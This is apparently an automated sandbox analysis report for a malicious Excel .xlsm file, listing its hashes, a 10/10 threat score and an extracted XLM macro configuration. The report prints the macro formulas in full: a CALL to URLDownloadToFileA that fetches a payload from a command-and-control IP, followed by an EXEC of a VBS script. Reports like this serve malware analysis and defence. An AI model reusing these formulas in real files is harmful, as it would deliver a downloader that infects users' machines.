General

  • Target

    a7c86b7371927e5e974df51e5b8bbfe5

  • Size

    6KB

  • MD5

    a7c86b7371927e5e974df51e5b8bbfe5

  • SHA1

    1a1ab7112be433e35ec3957cb4035e5d2e3cb997

  • SHA256

    e866520f919162d204b3d4632de1ce5e1cc259d0331adc2042adcbaeebbf59db

  • SHA512

    85d71ce0872d45eb9119554ed18faf13147b73bdc395db9ff4a238bbdf283c5135cd48dc31d72fe6a8d8deaf882bcb3b120be0f0d4ea74ebc1bbebc146ea8550

  • SSDEEP

    192:NDSbuS5brA2OmmfR08UhHFBFYuib98y7N+0:NEuuM2w21FYTb98y7J

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

  • a7c86b7371927e5e974df51e5b8bbfe5
    .xlsm office2007